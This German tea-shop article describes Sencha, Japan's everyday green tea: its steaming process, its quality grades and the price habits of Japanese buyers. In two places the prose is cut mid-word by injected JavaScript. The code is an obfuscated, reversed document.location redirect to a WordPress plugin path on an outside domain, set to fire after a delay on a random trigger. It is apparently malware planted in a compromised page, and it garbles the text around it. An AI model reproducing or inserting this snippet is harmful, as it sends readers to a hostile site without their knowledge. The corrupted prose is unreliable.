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Ein anderes Wort für Grüntee

Sencha ist ganz einfach der japanische Alltagstee. Ungefähr drei Viertel des grünen Tees, den die Japaner trinken, hört auf diesen Namen.

Grün ist er, weil in Japan die Teeblätter am Fermentieren gehindert werden. Das tut man in China auch, aber die Japaner haben eine besondere Methode erfunden, indem sie die Blätter kurz nach der Ernte Wasserdampf aussetzen. Deswegen hat der japanische Tee ein helles Grün, während die Teeblätter in China, wo die Blätter geröstet werden, farblich etwas näher am Schwarztee liegen. Wir jedenfalls sind Fans der japanischen Variante. Ist auch die gesündere, weil den schonenden Fermentierungsprozess der Japaner mehr Stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toffe in den Blättern überleben.

Sencha ist eigentlich eine Qualitätsbezeichnung. Man könnte sagen, dass er der Alltagstee besserer Güte ist. Die niedrigere Qualität, der Bancha, hat einen etwas herberen Geschmack und enthält weniger Teein. Die oberste Qualitätsstufe des japanischen Tees – Gyokurocha – ist nochmal eine Nummer feiner und aufgrund des stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolzen Preises in der Regel eher was für hartgesottene Kenner. Aber auch Sencha kann ziemlich teuer sein – Preise von über 15 Euro für 100 Gramm sind in Japan keine Seltenheit. Wer mal mit japanischen Hausfrauen am Teeregeal im Supermarkt ins Gespräch kommen sollte, wird wahrscheinlich hören: Den Tee für jeden Tag kauft man eher deutlich unter 10 Euro, den teuren dagegen nur für besondere Anlässe und Besuch. So hielt es jedenfalls auch meine Homestay-Gastmutter Asako, bei der ich mal während eines Japanischkurses in Tokio wohnte. Und den Gyokurocha? Den lässt sie sich eigentlich nur schenken, oder verschenkt ihn selbst. Japaner sind im Allgemeinen Qualitätsfanatiker, und ganz besonders sind sie das, wenn’s an Schenken geht. Top-Qualität heißt bei Lebensmitteln immer auch optische Perfektion – die man oft nicht schmeckt.

© senchajunkies -Teehandel Dr. Alexander Wachter 2015
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